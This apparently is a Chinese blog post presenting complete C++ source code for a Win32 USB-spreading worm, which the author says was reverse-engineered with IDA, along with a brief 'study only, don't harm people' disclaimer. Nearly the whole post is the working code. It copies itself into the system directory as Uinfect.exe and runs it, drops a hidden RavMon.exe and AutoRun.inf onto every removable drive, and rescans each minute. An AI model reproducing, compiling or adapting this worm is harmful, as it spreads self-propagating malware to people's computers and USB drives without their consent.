一个简单的C++编写的u盘病毒代码
一个win32下能用的U盘病毒 研究原理可以 别编译拿去害人就行 (ring3的病毒貌似也害不了人) 前久用IDA逆向出来的 感兴趣的可以看看。。。
#include<windows.h> #include<string.h> BOOL UDevice(); void ResourceToFile(char *filename,char *Name,char* Type); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { UDevice(); return 0; } BOOL UDevice() { while(1) { char Name[256]="H://"; char szName[256]; char ToPath[256]; char infPath[256]; char OpenUDevice[79]; UINT retType; memset(szName, 0, 256); memset(ToPath, 0, 256); memset(infPath, 0, 256); memset(OpenUDevice, 0, 79); //do //{ //}while() //遍历盘符 unsigned char i = 0x42; for(; i < 0x5B; i += 0x1) { Name[0] = i; retType = GetDriveType(Name); //判断是否是可移动存储设备 if(retType == DRIVE_REMOVABLE) { //得到自身文件路径 GetModuleFileName(NULL, szName, 256); //比较是否和U盘的盘符相同 if(strncmp(Name, szName, 1) == 0) { //得到系统目录 GetSystemDirectory(ToPath, 256); strcat(ToPath,"//Uinfect.exe"); //把自身文件复制到系统目录 if(CopyFile(szName, ToPath, TRUE)) { WinExec(ToPath, 0);//运行程序 } strcpy(OpenUDevice, "explorer "); strcat(OpenUDevice, Name); //打开U盘 WinExec(OpenUDevice,1); return 0; } else { strcpy(ToPath, Name); strcat(ToPath,"//RavMon.exe"); strcpy(infPath,Name); strcat(infPath,"//AutoRun.inf"); //还原U盘上的文件属性 SetFileAttributes(ToPath,FILE_ATTRIBUTE_NORMAL); SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL); //删除原有文件 DeleteFile(ToPath); DeleteFile(infPath); //释放AutoRun.inf到U盘 ResourceToFile(infPath, (char*)0x64, (char*)256); //拷贝自身文件到U盘 CopyFile(szName,ToPath,FALSE); //把这两个文件设置成系统,隐藏属性 //这里我查了MSDN 因为第二个参数的宏可能用了或位运算,所以推导宏定义有点麻烦 SetFileAttributes(ToPath, 0x6); SetFileAttributes(infPath, 0x6); } } } //一分钟检测一次U盘 Sleep(60000); } } void ResourceToFile(char *filename,char *Name,char* Type) { //寻找自身进程中的资源 HRSRC hRes = FindResource(NULL,Name,Type); if(hRes==NULL) return; //导入资源 HGLOBAL hgRes = LoadResource(NULL, hRes); if(hgRes==NULL) return; //锁定资源 void *pRes = LockResource(hgRes); if(pRes==NULL) return; //得到资源字节数 DWORD size = SizeofResource(NULL, hRes); if(size==0) return; //创建文件 HANDLE hFile = CreateFile(filename, 0x40000000, 0, 0, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, 0); if(hFile==INVALID_HANDLE_VALUE) return; DWORD dwWrite; //把资源写入到文件 if(!WriteFile(hFile, pRes, size, &dwWrite, 0)) return; //关闭文件句柄 CloseHandle(hFile); //释放资源 GlobalFree(hgRes); }
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/11111.html